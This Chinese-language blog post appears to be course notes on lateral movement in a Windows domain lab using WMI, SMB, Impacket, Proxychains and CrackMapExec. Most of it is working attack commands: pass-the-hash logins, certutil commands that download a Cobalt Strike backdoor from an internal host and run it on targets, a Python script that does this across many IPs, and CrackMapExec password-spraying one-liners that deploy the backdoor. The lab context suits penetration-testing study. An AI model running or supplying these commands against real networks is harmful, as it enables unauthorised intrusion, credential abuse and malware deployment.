内网安全-横向移动&Wmi&Smb&CrackMapExec&ProxyChains&Impacket
目录
内网安全-横向移动&Wmi&Smb&CrackMapExec&ProxyChains&Impacket
域横向移动-工具-Proxychains&CrackMapExec
1、Windows+Proxifier+Python_exp
Linux+Proxychains+CrackMapExec
知识点:
1、横向移动-WMI&SMB协议篇
2、横向移动-Impacket套件&CS插件
3、横向移动-Proxychains&CrackMapExec
本节课主要讲了三个重点,wmi和smb以及密码喷射项目
上节课我们讲了横向移动的IPC,这节课我们继续往下讲,会把WMI和SMB这两个讲一下
域信息收集-目标&用户&凭据&网络
本节课实验环境和上节课一样,这里就不过多阐述,这里我们成功的上线了win7,并判断了在域内,已经提权,并抓取到了明文密码和hash,并且对内网其他存活主机进行了探针
域横向移动-WMI-自带&命令&套件&插件
WMI是通过135端口进行利用,支持用户名明文或者hash的方式进行认证,并且该方法不会在目标日志系统留下痕迹。
1.wmic
内部:(单执行)
wmic /node:192.168.3.32 /user:administrator /password:admin!@#45 process call create "cmd.exe /c certutil -urlcache -split -f http://192.168.3.31/beacon.exe c:/beacon.exe"
wmic /node:192.168.3.32 /user:administrator /password:admin!@#45 process call create "cmd.exe c:/beacon.exe"
2.cscript
内置:(交互式)
上传wmiexec.vbs
cscript //nologo wmiexec.vbs /shell 192.168.3.21 administrator Admin12345
3.wmiexec-impacket
外部:(交互式&单执行)
wmiexec ./administrator:admin!@#45@192.168.3.32 "whoami"
wmiexec -hashes :518b98ad4178a53695dc997aa02d455c ./administrator@192.168.3.32 "whoami"
下载后门:
wmiexec ./administrator:admin!@#45@192.168.3.32 "cmd.exe /c certutil -urlcache -split -f http://192.168.3.31/beacon.exe c:/beacon.exe"
执行后门:
wmiexec ./administrator:admin!@#45@192.168.3.32 "cmd.exe /c c:/beacon.exe"
这里一共是有三种方法,我们常用的就是第三种方法,因为第一种和第二种的局限性比较大
第一种单执行,我们可以在CS里面直接输命令,但是不会得到回显,所以不知道命令有没有成功
这个wmic是windows内置的命令,不需要什么条件,但无回显
第二种交互式不适合在CS里面执行,因为他是交互式的,CS只有在底部能输命令,输完这个命令就直接执行了,无法进行交互,除非是那中图形化的或者能交互的还差不多,并且需要提前把wmiexec.vbs文件上传到win7(已经取得权限的机器)上面,这个文件不大,只有11kb,上传上去还是没啥大问题的
这个cscript也是内置的命令,该方法缺点就是无法在CS上面进行
第三种就比较常用了,就是我们上节课说的套件impacket,本节课会用到wmiexec这个exe,里面也有我们上节课用到的atexec.exe,其他的exe会在后面讲横向移动的其他知识的时候会用到。(并且第一种第二种不支持hash,只支持明文密码,而第三种不仅支持明文还支持hash)
同样的还有py版本的,他俩是一一对应的,只不过exe版本的需要上传到受控机器,这个局限比较大。而py版本的则可以通过利用代理转发,实现在本机执行命令。exe版本就是py版本封装打包之后的产物
这里我们就用py的来演示,首先把代理弄好,这个在上节课说过,这里就不说了。
这里我们利用反向,就是让目标机器去找win7,然后通过转发上线直接上线CS
把转发上线监听器生成的木马上传到WIN7,等会好利用wmi把这个后门下载到目标机器
这里不知道为啥目标机器为win2012报错,然后试了win2008r2的域控发现可以。然后就是利用命令把后门下载到目标机器并执行就会上线CS了
这里因为我的win7没有开网络服务,所以就没有搞接下来的,接下来的就比较简单,就是利用命令下载脚本并执行即可上线CS。
域横向移动-SMB-自带&命令&套件&插件
利用SMB服务可以通过明文或hash传递来远程执行,条件445服务端口开放。
1.psexec
内部:(交互式 windows官方工具)
psexec64 \\192.168.3.32 -u administrator -p admin!@#45 -s cmd
外部:(交互式 外人开发的工具)
psexec -hashes :518b98ad4178a53695dc997aa02d455c ./administrator@192.168.3.32
插件:
cs-psexec
这个内部的就是windows提供的一个工具,叫pstools,里面就有我么你要用到的psexec,并且也不大就300多k,也是windoes提供的,所以不存在被杀的风险,但是由于是交互式的,所以在CS里面不行,并且执行的命令想要成功还要有管理员权限才可以,也不支持hash
外部的就是我们的套件impacket里面的包含的exe的版本,支持hash的传递,但是不能用CS,所以也是比较难受
插件就是CS上面带的插件
这里有三个,可以都试试。
如果域这里没有填的话,就是用本地用户去登录,写域了就是用域用户去登录
这里也是可以成功上线的
2.smbexec-impacket
外部:(交互式)
smbexec ./administrator:admin!@#45@192.168.3.32
smbexec god/administrator:admin!@#45@192.168.3.32
smbexec -hashes :518b98ad4178a53695dc997aa02d455c ./administrator@192.168.3.32
smbexec -hashes :518b98ad4178a53695dc997aa02d455c god/administrator@192.168.3.32smbexec -hashes god/administrator:518b98ad4178a53695dc997aa02d455c@192.168.3.32
这个就是套件里面的py版本
这里我们配置好代理运行,这里也是成功的来到了3.30的cmd窗口
这里我用的本地用户去登陆的,实战中我们本地和域都要去尝试
3.services
内置:(单执行)
services -hashes :518b98ad4178a53695dc997aa02d455c ./administrator:@192.168.3.32 create -name shell -display shellexec -path C:\Windows\System32\shell.exe
services -hashes :518b98ad4178a53695dc997aa02d455c ./administrator:@192.168.3.32 start -name shell
这个就是利用wondows自带的services去创建一个服务名字为shell,然后把shell绑定上去,但是这个是单执行是没有回显的,也是比较的麻烦,了解一下可以。
域横向移动-工具-Proxychains&CrackMapExec
1、Windows+Proxifier+Python_exp
这里就是利用脚本去批量上线,因为是在本机,所以配合proxifier代理转发
那么这里可能会上线一些主机,那么我们就可以抓取到新上线主机的明文密码和hash,然后再把脚本中的密码和hash修改一下再运行。然后就是修改密码,上线;修改密码,上线。这样会很麻烦,因为要不停的修改,那么接下来就会介绍一款更加便捷的工具。
import os
ips=['192.168.3.21','192.168.3.25','192.168.3.29','192.168.3.28','192.168.3.30','192.168.3.32']
def down():
for ip in ips:
wmi_exec='D:\Myproject\\venv\Scripts\python.exe D:\Myproject\impacket-master\examples\\wmiexec.py ./administrator:admin!@#45@%s "cmd.exe /c certutil -urlcache -split -f http://192.168.3.31/4455.exe c:/4455.exe"'%ip
print(wmi_exec)
os.system(wmi_exec)
def zx():
for ip in ips:
wmi_exec='D:\Myproject\\venv\Scripts\python.exe D:\Myproject\impacket-master\examples\\wmiexec.py ./administrator:admin!@#45@%s "c:/4455.exe"'%ip
print(wmi_exec)
os.system(wmi_exec)
if __name__ == '__main__':
down()
zx()
Linux Proxychains使用
我们先说一下linux的代理工具,我们之前用的proxifier是windows用的,在Linux上面用不了,因此推荐一个新的工具Proxychains
安装使用:
Ubuntu 18.04及以上系统的安装与配置
Ubuntu 18.04 + 系统的官方源已经包含proxychains4,直接通过apt/apt-get安装即可。
1.1 安装
sudo apt update
sudo apt install proxychains4
1.2 配置
sudo vim /etc/proxychains4.conf
原文链接:Ubuntu下命令行加速、终端加速、命令行代理的方法/proxychains安装与使用_ubuntu安装proxychains_lyh458的博客-CSDN博客
我这里把端口改成了34280,也就是CS开启的socks端口,ip就写的本机,因为CS的服务端就是本机
代理配置:Proxychains.conf
代理调用:Proxychains 命令
安装完成之后,想要使用这个代理就可以直接Proxychains后面加上命令即可。
Linux+Proxychains+CrackMapExec
然后就是我们的linux配合这个代理工具加上密码喷射工具CrackMapExec进行密码喷射,批量上线CS,上面说那个脚本不方便,这个密码喷射工具就是我们要介绍的好项目
CrackMapExec
Github:GitHub - Porchetta-Industries/CrackMapExec: A swiss army knife for pentesting networks
官方手册:Introduction - CrackMapExec ~ CME WIKI
部分案例:CrackMapExec:一款针对大型Windows活动目录(AD)的后渗透工具 - FreeBuf网络安全行业门户
下载对应release,建立socks连接,设置socks代理,配置规则,调用!
后面不加--local-auth就是用本地用户登录,不加就是与用户登录。加上-x就是可以进行命令执行。
上线CS就是把命令弄成下载后门文件的命令,然后执行后门文件即可
也可以把账号密码写道文档之中,直接利用文档进行密码喷射,用户就用administrator即可,因为不是管理员用户的话也上线不了CS,我这里懒得弄了,就不搞了,有点麻烦我就觉的。
密码喷射域登录:
proxychains python cme smb 192.168.3.21-32 -u administrator -p 'admin!@#45'
密码喷射本地登录:
proxychains python cme smb 192.168.3.21-32 -u administrator -p 'admin!@#45' --local-auth
密码喷射本地登录命令执行:
proxychains python cme smb 192.168.3.21-32 -u administrator -p 'admin!@#45' -x 'whoami' --local-auth
密码喷射本地登录命令执行上线:
proxychains python cme smb 192.168.3.21-32 -u administrator -p 'admin!@#45' -x 'cmd.exe /c certutil -urlcache -split -f http://192.168.3.31/4455.exe c:/4455.exe & c:/4455.exe' --local-auth
密码喷射域登录命令执行上线:
proxychains python cme smb 192.168.3.21-32 -u administrator -p 'admin!@#45' -x 'cmd.exe /c certutil -urlcache -split -f http://192.168.3.31/4455.exe c:/4455.exe & c:/4455.exe'
密码喷射本地&域登录命令执行全自动上线:
proxychains python cme smb 192.168.3.21-32 -u user.txt -p pass.txt -x 'cmd.exe /c certutil -urlcache -split -f http://192.168.3.31/4455.exe c:/4455.exe & c:/4455.exe'
proxychains python cme smb 192.168.3.21-32 -u administrator -p pass.txt -x 'cmd.exe /c certutil -urlcache -split -f http://192.168.3.31/4455.exe c:/4455.exe & c:/4455.exe' --local-auth
706
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
